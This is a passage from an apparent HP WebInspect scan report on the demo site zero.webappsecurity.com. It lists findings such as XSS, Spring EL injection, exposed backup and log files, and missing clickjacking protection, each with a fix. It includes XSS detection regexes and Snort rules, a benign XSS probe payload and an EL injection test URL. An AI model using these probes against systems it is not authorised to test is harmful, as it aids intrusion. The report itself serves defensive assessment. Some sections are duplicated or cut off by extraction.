The above regular expression would be added into a new Snort rule as follows:
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"NII Cross-Site Scripting attempt";
flow:to_server,established; pcre:"/((\%3C) <)((\%2F) \/)*[a-z0-9\%]+((\%3E) >)/i"; classtype:Web-application-attack;
sid:9000; rev:5;)
Paranoid regex for XSS attacks:
/((\%3C) <)[^\n]+((\%3E) >)/I
This signature simply looks for the opening HTML tag, and its hex equivalent, followed by one or more characters other than
the new line, and then followed by the closing tag or its hex equivalent. This may end up giving a few false positives
depending upon how your web application and web server are structured, but it is guaranteed to catch anything that even
remotely resembles a Cross-Site Scripting attack.
For QA:
Fixes for Cross-Site Scripting defects will ultimately require code based fixes. Read the the following links for more information
about manually testing your application for Cross-Site Scripting.
Reference
OWASP Cross-Site Scripting Information
https://www.owasp.org/index.php/XSS
Microsoft
http://support.microsoft.com/default.aspx?scid=kb;EN-US;q252985
Microsoft Anti-Cross Site Scripting Library
https://msdn.microsoft.com/en-us/security/aa973814.aspx
CERT
http://www.cert.org/advisories/CA-2000-02.html
Apache
http://httpd.apache.org/info/css-security/apache_specific.html
SecurityFocus.com
http://www.securityfocus.com/infocus/1768
Classifications
CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)
CWE-82: Improper Neutralization of Script in Attributes of IMG Tags in a Web Page
CWE-83: Improper Neutralization of Script in Attributes in a Web Page
CWE-87: Improper Neutralization of Alternate XSS Syntax
101
CWE-116: Improper Encoding or Escaping of Output

CWE-692: Incomplete Blacklist to Cross-Site Scripting
CWE-811: OWASP Top Ten 2010 Category A2 - Cross-Site Scripting (XSS)
Kingdom: Input Validation and Representation

Summary
_
Cross-Site Scripting vulnerability found in Post parameter name. Triggering this vulnerability requires user action. The
following attack uses plain encoding:
<a HrEf=JaVaScRiPt:alert(87287)>
Cross-Site Scripting occurs when dynamically generated web pages display user input, such as login information, that is not
102
properly validated, allowing an attacker to embed malicious scripts into the generated page and then execute the script on the
machine of any user that views the site. User interaction vulnerabilities such as this one require the user to trigger the
execution of the malicious scripts via an action such as clicking a link or moving the mouse pointer over text. If successful,
Cross-Site Scripting vulnerabilities can be exploited to manipulate or steal cookies, create requests that can be mistaken for
those of a valid user, compromise confidential information, or execute malicious code on end user systems. Recommendations
include implementing secure programming techniques that ensure proper filtration of user-supplied data, and encoding all
user supplied data to prevent inserted scripts being sent to end users in a format that can be executed.
Execution
View the attack string included with the request to check what to search for in the response. For instance, if "(javascript:alert
('XSS')" is submitted as an attack, it will also appear as part of the response. This indicates that the web application is taking
values from the HTTP request parameters and using them in the HTTP response without first removing potentially malicious
data.
Implication
XSS can generally be subdivided into two categories: stored and reflected attacks. The main difference between the two is in
how the payload arrives at the server. Stored attacks are just that...in some form stored on the target server, such as in a
database, or via a submission to a bulletin board or visitor log. The victim will retrieve and execute the attack code in his
browser when a request is made for the stored information. Reflected attacks, on the other hand, come from somewhere else.
This happens when user input from a web client is immediately included via server-side scripts in a dynamically generated
web page. Via some social engineering, an attacker can trick a victim, such as through a malicious link or "rigged" form, to
submit information which will be altered to include attack code and then sent to the legitimate server. The injected code is
then reflected back to the user's browser which executes it because it came from a trusted server. The implication of each
kind of attack is the same.
Fix
For Development:
Cross-Site Scripting attacks can be avoided by carefully validating all input, and properly encoding all output. When validating
103
Server-side encoding, where all dynamic content is first sent through an encoding function where Scripting tags will be
replaced with codes in the selected character set, can help to prevent Cross-Site Scripting attacks.
Many web application platforms and frameworks have some built-in support for preventing Cross-Site Scripting. Make sure
that any built-in protection is enabled for your platform. In some cases, a misconfiguration could allow Cross-Site Scripting. In
ASP.NET, if a page's EnableViewStateMac property is set to False, the ASP.NET view state can be used as a vector for CrossSite Scripting.
An IDS or IPS can also be used to detect or filter out XSS attacks. Below are a few regular expressions that will help detect
Cross-Site Scripting.
Regex for a simple XSS attack:
/((\%3C) <)((\%2F) \/)*[a-z0-9\%]+((\%3E) >)/ix
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"NII Cross-Site Scripting attempt";
sid:9000; rev:5;)
/((\%3C) <)[^\n]+((\%3E) >)/I
remotely resembles a Cross-Site Scripting attack.
For QA:
Fixes for Cross-Site Scripting defects will ultimately require code based fixes. Read the HP Cross-Site Scripting white paper for
more information about manually testing your application for Cross-Site Scripting.
Reference
OWASP Cross-Site Scripting Information:
https://www.owasp.org/index.php/XSS
Microsoft:
http://support.microsoft.com/default.aspx?scid=kb;EN-US;q252985
Microsoft Anti-Cross Site Scripting Library
https://msdn.microsoft.com/en-us/security/aa973814.aspx
CERT:
http://www.cert.org/advisories/CA-2000-02.html
Apache:
http://httpd.apache.org/info/css-security/apache_specific.html
SecurityFocus.com:
http://www.securityfocus.com/infocus/1768
Classifications
104
CWE-82: Improper Neutralization of Script in Attributes of IMG Tags in a Web Page
CWE-83: Improper Neutralization of Script in Attributes in a Web Page
CWE-87: Improper Neutralization of Alternate XSS Syntax
CWE-692: Incomplete Blacklist to Cross-Site Scripting
Privacy Violation: Social Security Number ( 10834 )

Summary
A critical vulnerability has been detected within your web application due to the presence of one or more Social Security
Numbers. If this information is carried over to a production server, it can cause major security problems. Recommendations
include not storing this information on your web application.
Implication
Social Security Numbers are a highly sought out prize for attackers, and an item to which a large percentage of time would be
dedicated in an effort to find. At a minimum, this can lead to theft of the victim's identity.
Fix
When sensitive data needs to be available on your web application, mask part of the data so this information is not fully
disclosed.
Here are a few examples:
Social Security Numbers:
***-**-1234
123-**-****
Reference
105
Classifications
CWE-359: Privacy Violation

Kingdom: Security Features
Web Server Misconfiguration: Unprotected File ( 157 )

Summary
The Apache server status page (server-status) was found. This page contains detailed information about the current use of
your web server, including information about the current hosts and requests being processed. This vulnerability is caused by
default or incorrect configuration of the httpd.conf file. If exploited, an attacker could view the sensitive system information in
the file. Recommendations include editing the web server configuration file to prevent access to the server-status page.
Execution
To verify the exploit, click the following link:http://zero.webappsecurity.com:80/server-status
Implication
A basic requirement for a successful attack upon your web application is reconnaissance. An attacker will employ a variety of
methods, including malicious scanning agents and Google searches, to find out as much information about your web
application as possible. The attacker can then use that information to formulate the next method of attack. An attacker who
discovers sensitive system information has had a large portion of reconnaissance conducted for him or her.
Fix
For security reasons, you should restrict access to the server-status page in your web server configuration. To do this,
comment out the following lines in the httpd.conf file:
<Location /server-status>
SetHandler server-status
</Location>
For Development:
Unless you are actively involved with implementing the web application server, there is not a wide range of available solutions
to prevent problems that can occur from an attacker discovering sensitive system information about your application.
Primarily, this problem will be resolved by the web application server administrator or security operations. However, there are
certain actions you can take that will help to secure your web application and make it harder for an attacker to conduct a
successful attack.
Ensure that files containing sensitive information are not left publicly accessible, or that comments left inside files do not
reveal the locations of directories best left confidential.
Do not reveal information in pathnames that are publicly displayed. Do not include drive letters or directories outside of
the web document root in the pathname when a file must call another file on the web server. Use pathnames that are
relative to the current directory or the webroot.
Do not display error messages to the end user that provide information, such as directory names, that could be used in
Restrict access to important files or directories only to those who actually need it.
106
For QA:
This assessment performs the rote tasks of determining the directories and contents that are available via your web
application. For reasons of security, it is important to test the web application not only from the perspective of a normal user,
but also from that of a malicious one. Whenever possible, adopt the mindset of an attacker when testing your web application
for security defects. Access your web application from outside your firewall or IDS. Use Google or another search engine to
ensure that searches for vulnerable files or directories do not return information regarding your web application. For example,
an attacker will use a search engine, and search for directory listings such as 'index of / cgi-bin'. Make sure that your directory
structure is not obvious, and that only files that are necessary are capable of being accessed.
Reference
Apache Documentation
Configuration Files
Apache Module mod_status
Classifications

Kingdom: Environment

Summary
Webinspect has detected a backup file with the .bak extension on the target server. The severity of the threats posed by the
web-accessible backup files depends on the sensitivity of the information stored in original document. Based on that
information, the attacker can gain sensitive information about the site architecture, database and network access credential
details, encryption keys, and so forth from these files. The attacker can use information obtained to craft precise targeted
attacks, which may not otherwise be feasible, against the application.
Execution
Browse to http://zero.webappsecurity.com:80/faq.html.bak and inspect the content. Response should be a return with HTTP
status code 200 and should not match target sites file not found response.
Implication
An attacker can use the information obtained from the backup file of a sensitive document to craft a precise targeted attack
against the web application. Such attacks can include, but are not limited to, SQL injection, remote file system access to
overwrite or inject malware, and database manipulation.
Fix
Webroot Security Policy: Implement a security policy that prohibits storage of backup files in webroot.
Temporary Files: Many tools and editors automatically create temporary files or backup files in the webroot. Be careful
when editing files on a production server to avoid inadvertently leaving a backup or temporary copy of the file(s) in the
webroot.
Default Installations: Often, a lot of unnecessary files and folders are installed by default. For instance, IIS installations
include demo applications. Be sure to remove any files or folders that are not required for application to work properly.
107
Development Backup: Source code back up should not be stored and left available on the webroot.
Further QA can include test cases to look for the presence of backup files in the webroot to ensure none are left in publicly
accessible folders of the web application.
Reference
OWASP - Review Old, Backup and Unreferenced Files for Sensitive Information (OTG-CONFIG-004)
CWE - 200 Information Exposure
Classifications


Summary
Webinspect has detected a backup file with the .old extension on the target server. The severity of the threats posed by the
web-accessible backup files depends on the sensitivity of the information stored in original document. Based on that
information, the attacker can gain sensitive information about the site architecture, database and network access credential
details, encryption keys, and so forth from these files. The attacker can use information obtained to craft precise targeted
attacks, which may not otherwise be feasible, against the application.
Execution
Browse to http://zero.webappsecurity.com:80/index.html.old and inspect the content. Response should be a return with HTTP
Implication
Fix
webroot.
Reference
108
Classifications


Summary
The file debug.txt was located. This type of file is usually left by a developer or web master to test a certain function of the
web application or web server. Leaving test scripts available on the server is a very unsecure practice. The types of
information that can be gleaned from test scripts include fixed authentication session id's, usernames and passwords,
locations or pointers to confidential areas of the web site, and proprietary source code. With this type of information available
to an attacker , they can either use it to totally breach the security of the site or use it as a stepping stone to retrieve other
sensitive data. Recommendations include removing this file from the production server.
Fix
Remove the application from the server. Inform developers and administrators to remove test applications from servers when
they are no longer needed. While they are in use, be sure to protect them using HTTP basic authentication.
For Development:
Contact your security or network operations team and request they investigate the issue.
For QA:
Contact your security or network operations team and request they investigate the issue.
Reference
Classifications
CWE-284: Access Control (Authorization) Issues

109

Summary
Webinspect has detected a backup file by replacing the extension with .old on the target server. The severity of the threats
posed by the web-accessible backup files depends on the sensitivity of the information stored in original document. Based on
that information, the attacker can gain sensitive information about the site architecture, database and network access
credential details, encryption keys, and so forth from these files. The attacker can use information obtained to craft precise
targeted attacks, which may not otherwise be feasible, against the application.
Execution
Browse to http://zero.webappsecurity.com:80/index.old and inspect the content. Response should be a return with HTTP
Implication
Fix
webroot.
Reference
Classifications

Insecure Transport ( 4722 )

Summary
Any area of a web application that possibly contains sensitive information or access to privileged functionality such as remote
site administration functionality should utilize SSL or another form of encryption to prevent login information from being
sniffed or otherwise intercepted or stolen. http://zero.webappsecurity.com:80/login.html has failed this policy.
110
sniffed or otherwise intercepted or stolen. http://zero.webappsecurity.com:80/login.html has failed this policy.

Recommendations include ensuring that sensitive areas of your web application have proper encryption protocols in place to
prevent login information and other data that could be helpful to an attacker from being intercepted.
Implication
An attacker who exploited this design vulnerability would be able to utilize the information to escalate their method of attack,
possibly leading to impersonation of a legitimate user, the theft of proprietary data, or execution of actions not intended by
the application developers.
Fix
Ensure that sensitive areas of your web application have proper encryption protocols in place to prevent login information and
other data that could be helpful to an attacker from being intercepted.
For Development:
For QA:
Test the application not only from the perspective of a normal user, but also from the perspective of a malicious one.
Reference
Classifications
CWE-287: Improper Authentication

Web Server Misconfiguration: HTTP Basic Authentication ( 10512 )

Summary
Any area of a web application that possibly contains sensitive information or access to privileged functionality such as remote
site administration functionality should utilize SSL or another form of encryption to prevent login information from being
sniffed or otherwise intercepted or stolen. http://zero.webappsecurity.com:80/manager/html has failed this policy.
Implication
Fix
111

For Development:
For QA:
Test the application not only from the perspective of a normal user, but also from the perspective of a malicious one.
Reference
Classifications

Often Misused: Login ( 10595 )

Summary
An unencrypted login form has been discovered. Any area of a web application that possibly contains sensitive information or
access to privileged functionality such as remote site administration functionality should utilize SSL or another form of
encryption to prevent login information from being sniffed or otherwise intercepted or stolen. If the login form is being served
over SSL, the page that the form is being submitted to MUST be accessed over SSL. Every link/URL present on that page (not
just the form action) needs to be served over HTTPS. This will prevent Man-in-the-Middle attacks on the login form.
Implication
Fix
Reference
Advisory:http://www.kb.cert.org/vuls/id/466433
Classifications

112
Kingdom: API Abuse
Cross-Frame Scripting ( 11293 )

Summary
A Cross-Frame Scripting (XFS) vulnerability can allow an attacker to load the vulnerable application inside an HTML iframe tag
on a malicious page. The attacker could use this weakness to devise a Clickjacking attack to conduct phishing, frame sniffing,
social engineering or Cross-Site Request Forgery attacks.
Clickjacking
The goal of a Clickjacking attack is to deceive the victim user into interacting with UI elements of the attackers choice on the
target web site without her knowledge and in turn executing privileged functionality on the victims behalf. To achieve this
goal, the attacker must exploit the XFS vulnerability to load the attack target inside an iframe tag, hide it using Cascading
Style Sheets (CSS) and overlay the phishing content on the malicious page. By placing the UI elements on the phishing page
to overlap with those on the page targeted in the attack, the attacker can ensure that the victim is forced to interact with the
UI elements on the target page not visible to the victim.
WebInspect has detected a page which potentially handles sensitive information using an HTML form with a password input
field and is missing XFS protection.
This response is not protected by a valid X-Frame-Options header.Furthermore,

An effective frame-busting technique was not observed while loading this page inside a frame.
Execution
Create a test page containing an HTML iframe tag whose src attribute is set to http://zero.webappsecurity.com:80/login.html.
Successful framing of the target page indicates the applications susceptibility to XFS.
Note that WebInspect will report only one instance of this check across each host within the scope of the scan. The other
visible pages on the site may, however, be vulnerable to XFS as well and hence should be protected against it with an
appropriate fix.
Implication
A Cross-Frame Scripting weakness could allow an attacker to embed the vulnerable application inside an iframe. Exploitation
of this weakness could result in:
Hijacking of user events such as keystrokes
Theft of sensitive information
Execution of privileged functionality through combination with Cross-Site Request Forgery attacks
Fix
Browser vendors have introduced and adopted a policy-based mitigation technique using the X-Frame-Options header.
Developers can use this header to instruct the browser about appropriate actions to perform if their site is included inside an
iframe.Developers must set the X-Frame-Options header to one of the following permitted values:
DENY
Deny all attempts to frame the page
SAMEORIGIN
The page can be framed by another page only if it belongs to the same origin as the page being framed
ALLOW-FROM origin
Developers can specify a list of trusted origins in the origin attribute. Only pages on origin are permitted to load this page
inside an iframe
Developers must also use client-side frame busting JavaScript as a protection against XFS. This will enable users of older
browsers that do not support the X-Frame-Options header to also be protected from clickjacking attacks.
113
Reference
HP 2012 Cyber Security Report
The X-Frame-Options header - a failure to launch
Server Configuration:
IIS
Apache, nginx
Specification:
X-Frame-Options IETF Draft
OWASP:
Clickjacking
Frame Busting:
Busting Frame Busting: A Study of Clickjacking Vulnerabilities on Popular Sites
OWASP: Busting Frame Busting
Classifications
CWE-352: Cross-Site Request Forgery (CSRF)

Expression Language Injection ( 11310 )

Summary
WebInspect has detected an Expression Language (EL) injection vulnerability. EL injection vulnerabilities are introduced when
an application fails to sufficiently validate untrusted user data before assigning it to attribute values of certain Spring MVC JSP
tags.
Expression Language allows JSP pages to easily access application data stored in user-defined JavaBeans components as well
the implicit objects. In addition, JSP pages can also invoke arbitrary public and static methods and perform arithmetic
operations using EL expressions.
By allowing attackers to inject EL expressions through insufficiently validated user input, an application could grant
unauthorized access to sensitive application and server information. Expression Language injection could also let attackers
bypass HTTPOnly access restrictions imposed on cookies by exploiting access to the implicit cookieobject made available in
EL expressions.
The affected spring framework versions include
3.0.0 to 3.0.5
2.5.0 to 2.5.6.SEC02 (community releases)
2.5.0 to 2.5.7.SR01 (subscription customers)
Execution
Click http://zero.webappsecurity.com:80/search.html?searchTerm=${5914%2b2593} to verify the vulnerability in a web
browser.
Implication
Expression Language injection vulnerabilities can be used to steal sensitive application information as well as bypass
HTTPOnly cookie access restrictions. The impact depends on the information available within the application's context.
114
HTTPOnly cookie access restrictions. The impact depends on the information available within the application's context.
Fix
The vulnerability can be fixed by upgrading to Spring framework versions 3.1 and above.
For versions below 3.1 (3.0.6 onwards, 2.5.6.SEC03 onwards and 2.5.7.SR02 onwards), set the value of
springJspExpressionSupportcontext parameter to false.
Reference
Vendor:
SpringSource
Advisory:
Expression Language Injection
CVE:
CVE-2011-2730
Expression Language:
Expression Language Specification
Classifications
CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command

Injection')
Web Server Misconfiguration: Directory Listing ( 746 )

Summary
A serious Directory Listing vulnerability was discovered within your web application. Risks associated with an attacker
discovering a Directory Listing, which is a complete index of all of the resources located in that directory, result from the fact
that files that should remain hidden, such as data files, backed-up source code, or applications in development, may then be
visible. The specific risks depend upon the specific files that are listed and accessible. Recommendations include restricting
access to important directories or files by adopting a "need to know" requirement for both the document and server root, and
turning off features such as Automatic Directory Listings that could expose private files and provide information that could be
utilized by an attacker when formulating or conducting an attack.
Execution
Implication
Risks associated with an attacker discovering a Directory Listing on your application server depend upon what type of
directory is discovered, and what types of files are contained within it. The primary threat from an accessible Directory Listing
is that hidden files such as data files, source code, or applications under development will then be visible to a potential
attacker. In addition to accessing files containing sensitive information, other risks include an attacker utilizing the information
discovered in that directory to perform other types of attacks.
115
Fix
For Development:
you are actively involved with implementing the web application server, there is not a wide range of available solutions to
prevent problems that can occur from an attacker finding a Directory Listing. Primarily, this problem will be resolved by the
web application server administrator. However, there are certain actions you can take that will help to secure your web
application.
One of the most important aspects of web application security is to restrict access to important files or directories only to
those individuals who actually need to access them. Ensure that the private architectural structure of your web application is
not exposed to anyone who wishes to view it as even seemingly innocuous directories can provide important information to a
potential attacker.
The following recommendations can help to ensure that you are not unintentionally allowing access to either information that
could be utilized in conducting an attack or propriety data stored in publicly accessible directories.
Turn off the Automatic Directory Listing feature in whatever application server package that you utilize.
Ensure that files containing sensitive information are not left publicly accessible.
Don't follow standard naming procedures for hidden directories. For example, don't create a hidden directory called "cgi"
that contains cgi scripts. Obvious directory names are just that...readily guessed by an attacker.
Remember, the harder you make it for an attacker to access information about your web application, the more likely it is that
he will simply find an easier target.
For QA:
For reasons of security, it is important to test the web application not only from the perspective of a normal user, but also
from that of a malicious one. Whenever possible, adopt the mindset of an attacker when testing your web application for
security defects. Access your web application from outside your firewall or IDS. Utilize Google or another search engine to
ensure that searches for vulnerable files do not return information from regarding your web application. For example, an
attacker will utilize a search engine, and search for directory listings such as the following: "index of / cgi-bin". Make sure that
your directory structure is not obvious, and that only files that are necessary are capable of being accessed.
Reference
Apache:
Security Tips for Server Configuration
Protecting Confidential Documents at Your Site
Securing Apache - Access Control
IIS:
Implementing NTFS Standard Permissions on Your Web Site
Netscape:
Controlling Access to Your Server
General:
Password-protecting web pages
Web Security
116
Classifications
CWE-548: Information Leak Through Directory Listing


Summary
A serious WS_FTP vulnerability was identified within your web application. WS_FTP is a popular FTP client for Windows which
is utilized by system administrators and developers to upload and download files from web servers, with each transfer notated
in a log file by default. Risks associated with an attacker discovering a WS-FTP log file result from the fact that files that
should remain hidden, such as administrative or maintenance applications, web application configuration files, or application
data files, may then be visible. Recommendations include removing the WS_FTP log file from the application server and
configuring WS_FTP so that it does not create log files.
Execution
Click the following link to examine the contents of the WS_FTP log file discovered on your web application server.
Implication
When WS_FTP is used to transfer files, a log file called 'ws_ftp.log' is created on the server. This log file contains records of
every file that is accessed by WS_FTP, which could possibly contain very valuable information to an attacker because it may
list files that are otherwise "hidden." This often includes administrative or maintenance applications, web application
configuration files, applications-in-development, backed-up application source code and possible application data files.
Primarily, WS_FTP log files are valuable to attackers because they display all files in a directory, not just ones that are
intended to be used. How easy is it for an attacker to take advantage of an insecure web application via the discovery of a
WS_FTP log file on your web application server? Often, this is as simple as typing in the name of the file garnered directly
from the WS_FTP log files. In essence, gaining access to a WS_TP log file greatly reduces the amount of effort a potential
attacker must employ to gain knowledge of your web application.
A fundamental necessity for a successful attack upon your web application is reconnaissance. An attacker will employ a variety
of methods, including malicious scanning agents and Google searches, to find out as much information about your web
application as possible. That information can then be utilized when the attacker is formulating his next method of attack. An
attacker who finds a WS_FTP log files has had a large portion of his reconnaissance conducted for him.
Fix
For Development:
Unless you are actively involved with implementing the web application server, there is not a wide range of available solutions
to prevent problems that can occur from an attacker finding a WS_FTP log file. Primarily, this problem will be resolved by the
web application server administrator. However, there are certain actions you can take that will help to secure your web
application.
There are two primary actions to take to eliminate the risk of a WS_FTP log file vulnerability.
117
Manually remove the WS_FTP log file from the application server.
Configure WS_FTP so that it does not create log files on servers.
One of the most important aspects of web application security is to restrict access to important files or directories only to
those individuals who actually need to access them. Ensure that the private architectural structure of your web application is
not exposed to anyone who wishes to view it as even seemingly innocuous directories can provide important information to a
potential attacker.
The following recommendations can help to ensure that you are not unintentionally allowing access to either information that
could be utilized in conducting an attack or propriety data stored in publicly accessible directories.
Don't follow standard naming procedures for hidden directories. For example, don't create a hidden directory called "cgi"
that contains cgi scripts. Obvious directory names are just that...readily guessed by an attacker.
Remember, the harder you make it for an attacker to access information about your web application, the more likely it is that
he will simply find an easier target.
For QA:
For reasons of security, it is important to test the web application not only from the perspective of a normal user, but also
from that of a malicious one. Whenever possible, adopt the mindset of an attacker when testing your web application for
security defects. Access your web application from outside your firewall or IDS. Utilize Google or another search engine to
ensure that searches for vulnerable files do not return information from regarding your web application. For example, an
attacker will utilize a search engine, and search for directory listings such as the following: "index of / cgi-bin". Make sure that
your directory structure is not obvious, and that only files that are necessary are capable of being accessed.
Reference
IIS:
Microsoft IIS FTP Information
General:
Password-protecting web pages
Web Security
FTP Clients
Classifications
CWE-284: Access Control (Authorization) Issues


Summary
HTML tag injection vulnerabilities were identified on this web application. HTML tag injections are used to aid in Cross-Site
118
HTML tag injection vulnerabilities were identified on this web application. HTML tag injections are used to aid in Cross-Site
Request Forgeries and phishing attacks against third-party web sites, and can often double as Cross-Site Scripting
vulnerabilities. Recommendations include implementing secure programming techniques that ensure proper filtration of usersupplied data, and encoding all user supplied data to prevent inserted scripts being sent to end users in a format that can be
executed.
Execution
If the session is vulnerable to a HTML Tag Injection attack, the same HTML sent in the request will also appear as part of the
response. View the attack string included with the request to check what to search for in the response. This indicates that the
web application is taking values from the HTTP request parameters and using them in the HTTP response without first
removing potentially malicious HTML.
Implication
HTML tag injection often has implications that are identical to Cross-Site Scripting, and can generally be subdivided into two
categories: stored and reflected attacks. The main difference between the two is in how the payload arrives at the server.
Stored attacks are just that...in some form stored on the target server, such as in a database, or via a submission to a bulletin
board or visitor log. The victim will retrieve and execute the attack code in his browser when a request is made for the stored
information. Reflected attacks, on the other hand, come from somewhere else. This happens when user input from a web
client is immediately included via server-side scripts in a dynamically generated web page. Via some social engineering, an
attacker can trick a victim, such as through a malicious link or "rigged" form, to submit information which will be altered to
include attack code and then sent to the legitimate server. The injected code is then reflected back to the user's browser
which executes it because it came from a trusted server. The implication of each kind of attack is the same.
The main problems associated with successful HTML tag injection & Cross-Site Scripting attacks are:
Fix
For Development:
HTML Tag Injection attacks can be avoided by carefully validating all input, and properly encoding all output. When validating
119
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"NII HTML Tag Injection attempt";
sid:9000; rev:5;)
/((\%3C) <)[^\n]+((\%3E) >)/I
remotely resembles a HTML Tag Injection attack.
For QA:
Fixes for HTML Injection defects will ultimately require code based fixes.
Reference
OWASP Cross-Site Scripting Information:
http://www.owasp.org/index.php/Cross_Site_Scripting
XSRF on OWASP:
http://www.owasp.org/index.php/XSRF
XSRF on Wikipedia:
http://en.wikipedia.org/wiki/Cross-site_request_forgery
Sans:
http://isc.sans.org/diary.php?storyid=1750
Classifications
120

Summary
An application include file was found. This results in a possible information disclosure vulnerability, exposing internal
application workings to an attacker who can then potentially leverage that information to exploit the application.
Recommendations include storing include files in a location other than the webroot.
Execution
Open a web browser and navigate to http://zero.webappsecurity.com:80/include/common.inc.
Implication
An attacker could view web application source code. Web application source code often contains database usernames,
passwords and connection strings and locations of sensitive files. It also reveals the detailed mechanics and design of the web
application's logic, which can be used to develop other attacks.
Fix
For Development:
Keep include files outside of the web root. Scripts can still be used to access and include them by using either relative or
absolute paths. This will prevent potential attackers from having direct access to include files from the web.
Take measures to prevent unauthorized access to important files or directories.
For QA:
From a security perspective, it is important to test the web application not only as a normal user, but also as a malicious one.
Make sure that the webroot is free from files that could be used to gather information about the application that could be
utilized in conducting more damaging attacks.
Reference
Classifications
CWE-94: Failure to Control Generation of Code ('Code Injection')

Insecure Deployment: Unpatched Application ( 10717 )

Summary
Apache versions 2.0.46, 2.0.51, 2.0.55, 2.0.59, 2.2.3, and 2.2.4 are known to contain a Cross-Site Scripting vulnerability.
121
Apache versions 2.0.46, 2.0.51, 2.0.55, 2.0.59, 2.2.3, and 2.2.4 are known to contain a Cross-Site Scripting vulnerability.
properly validated, allowing an attacker to embed malicious scripts into the generated page and then execute the script on the
machine of any user that views the site. If successful, Cross-Site Scripting vulnerabilities can be exploited to manipulate or
steal cookies, create requests that can be mistaken for those of a valid user, compromise confidential information, or execute
malicious code on end user systems. Apache 2.X reflects the HTTP method name within the '413 Request Entity Too Large'
error page which might allow an attacker to embed malicious script into the page via the HTTP method value.
Recommendations include updating to a fixed version of the application.
Execution
Click http://zero.webappsecurity.com:80/ to verify the vulnerability in a web browser.
Implication
Cross-Site Scripting happens when user input from a web client is immediately included via server-side scripts in a dynamically
generated web page. Via social engineering, an attacker can trick a victim, such as through a malicious link or "rigged" form,
to submit information which will be altered to include attack code and then sent to the legitimate server. The injected code is
then reflected back to the user's browser which executes it because it came from a trusted server.
Account hijacking
Javascript-based worm propagation
Information theft
Denial of service
Browser redirection
Manipulation of user settings
For more detailed information on Cross-Site Scripting attacks, see the HP Application Security Center Cross-Site Scripting
whitepaper.
Fix
Disable Apache's default 413 error pages by adding an 'ErrorDocument 413' statement to the Apache config file.
Reference
Vendor:
http://www.apache.org/
Advisory:
http://secunia.com/advisories/27906/
CVE:
CVE-2007-6203
HP:
HP Application Security Center Cross-SiteScripting Whitepaper
CERT:
CERTAdvisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests
OWASP:
Cross-SiteScripting
Classifications
122
Cross-Frame Scripting ( 11294 )

Summary
A Cross-Frame Scripting (XFS) vulnerability can allow an attacker to load the vulnerable application inside an HTML iframe tag
on a malicious page. The attacker could use this weakness to devise a Clickjacking attack to conduct phishing, frame sniffing,
social engineering or Cross-Site Request Forgery attacks.
Clickjacking
The goal of a Clickjacking attack is to deceive the victim user into interacting with UI elements of the attackers choice on the
target web site without her knowledge and in turn executing privileged functionality on the victims behalf. To achieve this
goal, the attacker must exploit the XFS vulnerability to load the attack target inside an iframe tag, hide it using Cascading
Style Sheets (CSS) and overlay the phishing content on the malicious page. By placing the UI elements on the phishing page
to overlap with those on the page targeted in the attack, the attacker can ensure that the victim is forced to interact with the
UI elements on the target page not visible to the victim.
WebInspect has detected a response containing one or more forms that accept user input but is missing XFS protection.
This response is not protected by a valid X-Frame-Options header.Furthermore,

An effective frame-busting technique was not observed while loading this page inside a frame.
Execution
Create a test page containing an HTML <iframe> tag whose src attribute is set to http://zero.webappsecurity.com:80/.
Successful framing of the target page indicates the applications susceptibility to XFS.
Note that WebInspect will report only one instance of this check across each host within the scope of the scan. The other
visible pages on the site may, however, be vulnerable to XFS as well and hence should be protected against it with an
appropriate fix.
Implication
A Cross-Frame Scripting weakness could allow an attacker to embed the vulnerable application inside an iframe. Exploitation
of this weakness could result in:
Hijacking of user events such as keystrokes
Theft of sensitive information
Execution of privileged functionality through combination with Cross-Site Request Forgery attacks
Fix
Browser vendors have introduced and adopted a policy-based mitigation technique using the X-Frame-Options header.
Developers can use this header to instruct the browser about appropriate actions to perform if their site is included inside an
iframe. Developers must set the X-Frame-Options header to one of the following permitted values:
DENY
Deny all attempts to frame the page
SAMEORIGIN
The page can be framed by another page only if it belongs to the same origin as the page being framed
ALLOW-FROM origin
123
inside an iframe
Developers must also use client-side frame busting JavaScript as a protection against XFS. This will enable users of older
browsers that do not support the X-Frame-Options header to also be protected from clickjacking attacks.
Reference
HP 2012 Cyber Security Report
The X-Frame-Options header - a failure to launch
Server Configuration:
IIS
Apache, nginx
Specification:
X-Frame-Options IETF Draft
OWASP:
Clickjacking
Frame Busting:
Busting Frame Busting: A Study of Clickjacking Vulnerabilities on Popular Sites
OWASP: Busting Frame Busting
Classifications


Summary
A minor vulnerability has been discovered within your web application due to the the presence of a fully qualified path name
to the root of your system. This most often occurs in context of an error being produced by the web application. Fully qualified
server path names allow an attacker to know the file system structure of the web server, which is a baseline for many other
types of attacks to be successful. Recommendations include adopting a consistent error handling scheme and mechanism that
prevents fully qualified path names from being displayed.
Execution
To verify the issue, click the 'HTTP Response' button on the properties view and review the highlighted areas to determine the
Unix path found.
Fix
For Development:
Don't display fully qualified pathnames as part of error or informational messages. At the least, fully qualified pathnames can
provide an attacker with important information about the architecture of web application.
The following recommendations will help to ensure that a potential attacker is not deriving valuable information from any error
message that is presented.
124
Proper Error Handling: Utilize generic error pages and error handling logic to inform end users of potential problems.
Do not provide system information or other data that could be utilized by an attacker when orchestrating an attack.
For QA:
testing must be conducted to cause internal errors to gauge the reaction of the site.
which could reveal the existence of a file to an attacker? It is often a seemingly innocuous piece of information that provides
an attacker with the means to discover something else which he can then utilize when conducting an attack.
Reference
Classifications

Kingdom: Errors

Summary
System Environment variables log files contain information about the nature of your web application, and would allow an
attacker to gain insightful information about the web system setup. Recommendations include removing this file from the
affected system.
Implication
A fundamental part of any successful attack is reconnaissance and information gathering. The primary danger from
exploitation of this vulnerability is that an attacker will be able to utilize the information in launching a more serious attack. It
is very simple to check for its existence, and a file most definitely on the short list of things for which a potential attacker
would look.
Fix
125

Remove this file from the system in question. One of the most important aspects of web application security is to restrict
access to important files or directories only to those individuals who actually need to access them. Ensure that the private
architectural structure of your web application is not exposed to anyone who wishes to view it as even seemingly innocuous
directories can provide important information to a potential attacker.
For QA:
Notify your Security or Network Operations team of this issue.
For Development:
